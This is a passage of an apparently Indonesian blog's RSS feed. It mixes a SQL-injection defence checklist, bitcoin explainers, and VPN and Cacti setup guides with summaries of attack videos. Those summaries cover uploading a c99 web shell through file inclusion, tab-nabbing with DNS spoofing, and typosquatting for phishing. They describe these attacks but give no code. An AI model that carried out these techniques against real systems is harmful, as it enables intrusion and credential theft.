&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;4.&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;Stores the credentials of the database in a separate file.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px; margin-left: 36pt; text-indent: -18pt;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;5.&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;Use the principle of least privilege.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px; margin-left: 36pt; text-indent: -18pt;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;6.&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;Turn off the magic quotes.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px; margin-left: 36pt; text-indent: -18pt;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;7.&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;Disable shell access.&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px; margin-left: 36pt; text-indent: -18pt;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;8.&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;Disable any feature of the bank that you do not need&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px; margin-left: 36pt; text-indent: -18pt;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;9.&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;Test your code&lt;o:p style="box-sizing: border-box;"&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNoSpacing" style="background-color: #fdfdfd; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; line-height: 17.600000381469727px; margin-left: 36pt; text-indent: -18pt;"&gt;
&lt;span style="box-sizing: border-box; font-family: Georgia, 'Times New Roman', serif;"&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;10.&amp;nbsp;&lt;/span&gt;&lt;span lang="EN-US" style="box-sizing: border-box;"&gt;Search in google advanced techniques to correct this vulnerability.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;a href="http://blog.hackersonlineclub.com/2014/03/playing-with-sql-injection-and-firewall.html"&gt;Sumber&lt;/a&gt;&lt;/div&gt;
&lt;span class="fullpost"&gt;


&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (d'ZheNwaY)</author></item><item><title>Rincian Nilai Bitcoin</title><link>http://dzhenway.slackerc0de.us/2014/03/rincian-nilai-bitcoin.html</link><category>Bitcoin</category><category>BTC</category><category>Info</category><category>mBTC</category><category>Nilai</category><category>Satoshi</category><category>uBTC</category><pubDate>Mon, 10 Mar 2014 21:37:00 +0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1090696245688506420.post-4059075053244180682</guid><description>Bitcoin terdiri dari 8 angka 0 yaitu 0.00000000 yang urutan nilainya seperti&lt;br /&gt;
0.00000001 BTC = 1 satoshi&lt;br /&gt;
0.0000001 BTC = 10 satoshi&lt;br /&gt;
0.000001 BTC = 1 uBTC (micro)&lt;br /&gt;
0.00001 BTC = 10 uBTC&lt;br /&gt;
0.0001 BTC = 100 uBTC&lt;br /&gt;
0.001 BTC = 1 mBTC (milli)&lt;br /&gt;
0.01 BTC = 10 mBTC&lt;br /&gt;
0.1 BTC = 100 mBTC&lt;br /&gt;
1 BTC = 1 BTC&lt;br /&gt;
10 BTC = 10 BTC&lt;br /&gt;
100 BTC = 100 BTC&lt;br /&gt;
1.000 BTC = 1 kBTC (kilo)&lt;br /&gt;
10.000 BTC = 10 kBTC&lt;br /&gt;
100.000 BTC = 100 kBTC&lt;br /&gt;
1.000.000 BTC = 1 MBTC (mega)&lt;br /&gt;
10.000.000 BTC = 10 MBTC&lt;br /&gt;
&lt;span class="fullpost"&gt;


&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (d'ZheNwaY)</author></item><item><title>Bitcoin</title><link>http://dzhenway.slackerc0de.us/2014/02/bitcoin.html</link><category>Bitcoin</category><category>Satoshi</category><category>Satoshi Nakamoto</category><pubDate>Sat, 22 Feb 2014 13:43:00 +0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1090696245688506420.post-2113641059660673638</guid><description>&lt;div style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 19.200000762939453px; margin-bottom: 0.5em; margin-top: 0.4em;"&gt;
&lt;b&gt;Bitcoin&lt;/b&gt;&amp;nbsp;adalah sebuah&amp;nbsp;&lt;a href="http://id.wikipedia.org/wiki/Uang_elektronik" style="background-image: none; background-position: initial initial; background-repeat: initial initial; color: #0b0080; text-decoration: none;" title="Uang elektronik"&gt;uang elektronik&lt;/a&gt;&amp;nbsp;yang di buat pada tahun 2009 oleh Satoshi Nakamoto. Nama tersebut juga dikaitkan dengan perangkat lunak&amp;nbsp;&lt;a href="http://id.wikipedia.org/wiki/Sumber_terbuka" style="background-image: none; background-position: initial initial; background-repeat: initial initial; color: #0b0080; text-decoration: none;" title="Sumber terbuka"&gt;sumber terbuka&lt;/a&gt;&amp;nbsp;yang dia rancang, dan juga menggunakan jaringan peer-ke-peer yang menghubungkan semuanya. Tidak seperti mata uang pada umumnya, bitcoin tidak tergantung dengan mempercayai penerbit utama. Bitcoin menggunakan sebuah&amp;nbsp;&lt;a class="new" href="http://id.wikipedia.org/w/index.php?title=Database_yang_didistribusikan&amp;amp;action=edit&amp;amp;redlink=1" style="background-image: none; background-position: initial initial; background-repeat: initial initial; color: #a55858; text-decoration: none;" title="Database yang didistribusikan (halaman belum tersedia)"&gt;database yang didistribusikan&lt;/a&gt;&amp;nbsp;dan menyebar ke node-node dari sebuah jaringan&amp;nbsp;&lt;a href="http://id.wikipedia.org/wiki/P2P" style="background-image: none; background-position: initial initial; background-repeat: initial initial; color: #0b0080; text-decoration: none;" title="P2P"&gt;P2P&lt;/a&gt;&amp;nbsp;ke jurnal transaksi, dan menggunakan&amp;nbsp;&lt;a href="http://id.wikipedia.org/wiki/Kriptografi" style="background-image: none; background-position: initial initial; background-repeat: initial initial; color: #0b0080; text-decoration: none;" title="Kriptografi"&gt;kriptografi&lt;/a&gt;&amp;nbsp;untuk menyediakan fungsi-fungsi keamanan dasar, seperti memastikan bahwa bitcoin-bitcoin hanya dapat dihabiskan oleh orang mempunyainya, dan tidak pernah boleh dilakukan lebih dari satu kali.&lt;/div&gt;
&lt;div style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 19.200000762939453px; margin-bottom: 0.5em; margin-top: 0.4em;"&gt;
Desain dari Bitcoin memperbolehkan untuk kepemilikan tanpa identitas (anonymous) dan pemindahan kekayaan. Bitcoin - bitcoin dapat disimpan di komputer pribadi dalam sebuah format&amp;nbsp;&lt;i&gt;file wallet&lt;/i&gt;&amp;nbsp;atau di simpan oleh sebuah&amp;nbsp;&lt;i&gt;servis wallet&lt;/i&gt;&amp;nbsp;pihak ketiga, dan terlepas dari semua itu Bitcoin - bitcoin dapat di kirim lewat internet kepada siapapun yang mempunyai sebuah&amp;nbsp;&lt;i&gt;alamat Bitcoin&lt;/i&gt;. Topologi peer-to-peer bitcoin dan kurangnya administrasi tunggal membuatnya tidak mungkin untuk otoritas, pemerintahan apapun, untuk memanipulasi nilai dari bitcoin - bitcoin atau menyebabkan&amp;nbsp;&lt;a href="http://id.wikipedia.org/wiki/Inflasi" style="background-image: none; background-position: initial initial; background-repeat: initial initial; color: #0b0080; text-decoration: none;" title="Inflasi"&gt;inflasi&lt;/a&gt;&amp;nbsp;dengan memproduksi lebih banyak bitcoin.&lt;/div&gt;
&lt;div style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 19.200000762939453px; margin-bottom: 0.5em; margin-top: 0.4em;"&gt;
Bitcoin adalah salah satu dari implementasi pertama dari yang disebut&amp;nbsp;&lt;a class="new" href="http://id.wikipedia.org/w/index.php?title=Cryptocurrency&amp;amp;action=edit&amp;amp;redlink=1" style="background-image: none; background-position: initial initial; background-repeat: initial initial; color: #a55858; text-decoration: none;" title="Cryptocurrency (halaman belum tersedia)"&gt;cryptocurrency&lt;/a&gt;, pertama kali di deskripsikan oleh Wei Dai pada tahun 1998 dalam milis&amp;nbsp;&lt;a class="new" href="http://id.wikipedia.org/w/index.php?title=Cypherpunk&amp;amp;action=edit&amp;amp;redlink=1" style="background-image: none; background-position: initial initial; background-repeat: initial initial; color: #a55858; text-decoration: none;" title="Cypherpunk (halaman belum tersedia)"&gt;cypherpunks&lt;/a&gt;&lt;/div&gt;
&lt;div style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 19.200000762939453px; margin-bottom: 0.5em; margin-top: 0.4em;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 19.200000762939453px; margin-bottom: 0.5em; margin-top: 0.4em;"&gt;
&lt;a href="http://id.wikipedia.org/wiki/Bitcoin"&gt;Sumber&lt;/a&gt;&lt;/div&gt;
&lt;span class="fullpost"&gt;


&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (d'ZheNwaY)</author></item><item><title> Fimap Tool - Local And Remote File Inclusion With Backbox Linux </title><link>http://dzhenway.slackerc0de.us/2012/09/fimap-tool-local-and-remote-file.html</link><category>Apa Saja</category><category>Attack</category><category>Backbox</category><category>FIMAP</category><category>Hacking</category><category>LFI</category><category>Linux</category><category>local file inclusion</category><category>remote file inclusion</category><category>RFI</category><category>Software</category><category>Videos</category><category>Youtube</category><pubDate>Wed, 26 Sep 2012 22:55:00 +0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1090696245688506420.post-9188436600273239880</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/WRc0yWLG7BU?feature=player_embedded' frameborder='0'&gt;&lt;/iframe&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;b&gt;Description:&lt;/b&gt; LFI ATTACK WITH FIMAP, target DVWA, arm BACKBOX LINUX.&lt;br /&gt;&lt;br /&gt;First
 you need to install DVWA*, then run Apache server (comes with BackBox 
Linux), then read how to use FIMAP (terminal fimap -h), one c99 shell 
script (to find one type inurl:c99.txt in Google search box).You will 
need to set Apache directory permissions, for this you can use this bash
 script : &lt;a href="http://www.linux.re.rs/files/scripts/dirbash.sh" rel="nofollow"&gt;http://www.linux.re.rs/files/scripts/dirbash.sh&lt;/a&gt;. I will show you how to upload shell to vulnerable server and exploit the vulnerability.&lt;br /&gt;&lt;br /&gt;* How to install DVWA with BackBox Linux !&lt;br /&gt;    &lt;br /&gt; &lt;a href="http://www.anonimus.re.rs/6562" rel="nofollow"&gt;http://www.anonimus.re.rs/6562&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Author : Nenad Marjanovic&lt;br /&gt;IT nick : ZEROF&lt;br /&gt;Author site : &lt;a href="http://www.pentester.iz.rs/" rel="nofollow"&gt;http://www.pentester.iz.rs&lt;/a&gt;&amp;nbsp;

 
&lt;/div&gt;
&lt;span class="fullpost"&gt;


&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (d'ZheNwaY)</author></item><item><title> Urlcrazy Tool On Backtrack 5 R3 </title><link>http://dzhenway.slackerc0de.us/2012/09/urlcrazy-tool-on-backtrack-5-r3.html</link><category>Apa Saja</category><category>Attack</category><category>Backtrack</category><category>Hacking</category><category>Software</category><category>Step by Step</category><category>UrlCrazy</category><category>Videos</category><category>Youtube</category><pubDate>Tue, 25 Sep 2012 19:35:00 +0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1090696245688506420.post-2323696367377607088</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/EsxmpqOYylc?feature=player_embedded' frameborder='0'&gt;&lt;/iframe&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span class="fullpost"&gt;&lt;b&gt;Description:&lt;/b&gt; URLCrazy is a tool that can generate and test domain
 typos and variations to detect and perform typo squatting, URL 
hijacking, phishing, and corporate espionage. It generates 15 types of 
domain variants, knows over 8000 common misspellings, supports multiple 
keyboard layouts, can check if a typo is a valid domain, tests if domain
 typos are in use, and estimates the popularity of a typo.&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span class="fullpost"&gt;&lt;a href="http://www.securitytube.net/"&gt;Sumber&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (d'ZheNwaY)</author></item><item><title> Vega Web Scanner On Backtrack 5 R3 </title><link>http://dzhenway.slackerc0de.us/2012/09/vega-web-scanner-on-backtrack-5-r3.html</link><category>Apa Saja</category><category>Attack</category><category>Backtrack</category><category>Hacking</category><category>Info</category><category>Scanner</category><category>Software</category><category>Vega</category><category>Videos</category><category>Youtube</category><pubDate>Tue, 25 Sep 2012 19:14:00 +0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1090696245688506420.post-8895293281059672595</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/eDJisKixt5A?feature=player_embedded' frameborder='0'&gt;&lt;/iframe&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span class="fullpost"&gt;&amp;nbsp;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span class="fullpost"&gt;&lt;b&gt;Description:&lt;/b&gt; Vega is an open source platform to test the security
 of web applications. Vega can help you find and validate SQL 
Injections, Cross-Site Scripting (XSS), inadvertently disclosed 
sensitive information, and other vulnerabilities. It is written in Java,
 GUI based, and runs on Linux, OS X, and Windows.&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span class="fullpost"&gt;&lt;a href="http://www.securitytube.net/"&gt;Sumber&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (d'ZheNwaY)</author></item><item><title> Tab-Nabbing With Dns Spoofing Using Backtrack </title><link>http://dzhenway.slackerc0de.us/2012/09/tab-nabbing-with-dns-spoofing-using.html</link><category>Apa Saja</category><category>Attack</category><category>Backtrack</category><category>DNS</category><category>Hacking</category><category>Info</category><category>sniffer</category><category>Spoofing</category><pubDate>Sun, 23 Sep 2012 11:33:00 +0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1090696245688506420.post-3202042084651380197</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/ibHkfR0j6BQ?feature=player_embedded' frameborder='0'&gt;&lt;/iframe&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;b&gt;Description:&lt;/b&gt; In this Tutorial I have Explained how to use SET ( 
Social Engineering tool kit) for Tab nabbing and DNS Spoofing using 
Ettercap to make it more effective in LAN.......&lt;br /&gt;&lt;br /&gt;In next tutorial
 I will Explain How to do it using port 443 of attacker machine instead 
of using port 80. So that even if victim type https://url instead of 
http then also he/she get attacked.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;a href="http://securityphresh.com/"&gt;Sumber&lt;/a&gt;&amp;nbsp;&lt;/div&gt;
&lt;span class="fullpost"&gt;


&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (d'ZheNwaY)</author></item><item><title>[Tutor] Setting PPTP pada Linux</title><link>http://dzhenway.slackerc0de.us/2012/09/tutor-setting-pptp-pada-linux.html</link><category>Anonymous</category><category>Apa Saja</category><category>Install</category><category>Linux</category><category>Software</category><category>VPN</category><pubDate>Sun, 23 Sep 2012 10:38:00 +0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1090696245688506420.post-1684968089168719060</guid><description>Assalamu'alaikum Wr Wb&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
kalian semua pasti tau VPN,,dimana kita bisa surfing di dunia maya tanpa ketahuan IP asli kita&lt;br /&gt;
&lt;br /&gt;
kemaren ane ada problem ketika selesai order VPN, dimana VPN tersebut tidak support untuk linux &lt;br /&gt;
&lt;br /&gt;
setelah ane browsing, ternyata type yg support untuk linux itu PPTP.&lt;br /&gt;
&lt;br /&gt;
apa itu PPTP? bisa kalian cari sendiri definisinya dari google&lt;br /&gt;
&lt;br /&gt;
oke langsung aja biar gak lama&lt;br /&gt;
&lt;br /&gt;
CEKIDOT !!!&lt;br /&gt;
&lt;br /&gt;
1. Pertama kita cek terlebih dahulu IP kita sebelum memakai PPTP&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i842.photobucket.com/albums/zz349/dzhenway/ipnochange.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="179" src="http://i842.photobucket.com/albums/zz349/dzhenway/ipnochange.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
2. Masuk ke menu &lt;span style="color: red;"&gt;System&lt;/span&gt; -- &amp;gt; &lt;span style="color: red;"&gt;Preferences&lt;/span&gt; --&amp;gt; &lt;span style="color: red;"&gt;Network Connections&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
3. Masuk ke menu &lt;span style="color: red;"&gt;VPN&lt;/span&gt; --&amp;gt; &lt;span style="color: red;"&gt;Add&lt;/span&gt; --&amp;gt; Pilih &lt;span style="color: red;"&gt;Point to Point Tunneling Protocol (PPTP) &lt;/span&gt;--&amp;gt; klik &lt;span style="color: red;"&gt;Create&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i842.photobucket.com/albums/zz349/dzhenway/pointtopoint.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="179" src="http://i842.photobucket.com/albums/zz349/dzhenway/pointtopoint.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
4. a. Isi &lt;span style="color: red;"&gt;Connection Name&lt;/span&gt; dengan nama VPN kita&lt;br /&gt;
&amp;nbsp;&amp;nbsp; b. Isi &lt;span style="color: red;"&gt;Gateway&lt;/span&gt; server VPN kita&lt;br /&gt;
&amp;nbsp;&amp;nbsp; c. Isi &lt;span style="color: red;"&gt;Username&lt;/span&gt; beserta &lt;span style="color: red;"&gt;Password&lt;/span&gt;nya&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i842.photobucket.com/albums/zz349/dzhenway/settingan1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="179" src="http://i842.photobucket.com/albums/zz349/dzhenway/settingan1.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
5. Setelah itu klik menu &lt;span style="color: red;"&gt;Advanced&lt;/span&gt; yang ada dibawah pojok kanan, dan centang pada bagian &lt;span style="color: red;"&gt;Use Point to Point Encryption (MPPE)&lt;/span&gt; kemudian klik &lt;span style="color: red;"&gt;OK&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i842.photobucket.com/albums/zz349/dzhenway/centang.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="179" src="http://i842.photobucket.com/albums/zz349/dzhenway/centang.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
6. Setelah semua dipastikan benar sekarang klik &lt;span style="color: red;"&gt;Apply&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
7. Jika semua tahap diatas sudah benar, maka secara otomatis VPN akan keluar dengan sendiri&lt;br /&gt;
&lt;br /&gt;
8. Untuk menggunakan PPTP bisa langsung klik gambar Sinyal yang ada di pojok kanan atas, kemudian masuk ke menu &lt;span style="color: red;"&gt;VPN Connections&lt;/span&gt;. Nantinya disana akan keluar nama VPN yang kita tulis pada step ke 4. Tinggal klik aja pada nama VPN yang keluar dan tunggu beberapa saat maka simbol sinyal akan ada gambar gemboknya&lt;br /&gt;
&lt;br /&gt;
9. Setelah ada gambar gembok kita coba cek IP kita setelah memakai VPN PPTP&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i842.photobucket.com/albums/zz349/dzhenway/changeip-1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="179" src="http://i842.photobucket.com/albums/zz349/dzhenway/changeip-1.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
yups selamat VPN kalian sudah bekerja dengan baik&lt;br /&gt;
&lt;br /&gt;
untuk mengganti server, bisa kita edit di bagian &lt;span style="color: red;"&gt;Gateway&lt;/span&gt;-nya&lt;br /&gt;
&lt;br /&gt;
sekarang kita bisa surfing di dunia maya dengan aman dan terkendali&lt;br /&gt;
&lt;br /&gt;
mungkin sekian dulu dari ane, klo ada salah mohon maaf yang sebesar-besarnya&lt;br /&gt;
&lt;br /&gt;
semoga bermanfaat untuk semuanya&lt;br /&gt;
&lt;br /&gt;
Wassalamu'alaikum Wr Wb&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://hacker-newbie.org/showthread.php?tid=14977"&gt;Sumber&lt;/a&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;


&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (d'ZheNwaY)</author></item><item><title>Install Cacti di Ubuntu</title><link>http://dzhenway.slackerc0de.us/2012/09/install-cacti-di-ubuntu.html</link><category>Apa Saja</category><category>Cacti</category><category>Info</category><category>Install</category><category>Linux</category><category>Networking</category><category>Software</category><category>Step by Step</category><category>Ubuntu 10.10</category><pubDate>Sun, 23 Sep 2012 10:28:00 +0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1090696245688506420.post-8507071946307007327</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
Assalamu'alaikum Wr Wb&lt;br /&gt;
&lt;br /&gt;
sebenarnya klo di cari google udah banyak untuk tutorialnya, tapi gak ada salahnya kn ane share disini &lt;br /&gt;&lt;br /&gt;pertama-tama kita cari tau apa itu cacti??&lt;br /&gt;&lt;br /&gt;Cacti adalah sebuah network monitoring grafis berbasis rrdtool, umumnya digunakan untuk memantau link dan pemakaian bandwidth. Software ini berjalan baik di keluarga nix, termasuk linux dan Unix, dan windows.&lt;br /&gt;&lt;br /&gt;oke sekarang masuk ke tahap instalasi &lt;br /&gt;&lt;br /&gt;1. Masuk ke Terminal dan login sebagai root kemudian ketikkan command berikut ini&lt;br /&gt;&lt;br /&gt;&lt;b&gt;root@hacker:/# apt-get install cacti-cactid&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;2. Configure libphp-adodb&lt;br /&gt;&lt;br /&gt;Jika muncul configurasi tersebut, maka tekan Enter ( OK )&lt;br /&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i842.photobucket.com/albums/zz349/dzhenway/cacti1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="187" src="http://i842.photobucket.com/albums/zz349/dzhenway/cacti1.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;3. Configure dbase for cacti&lt;br /&gt;&lt;br /&gt;Konfigurasi dbase cacti dengan dbconfig-common, maka dijawab “YES”.&lt;br /&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i842.photobucket.com/albums/zz349/dzhenway/cacti2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="187" src="http://i842.photobucket.com/albums/zz349/dzhenway/cacti2.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
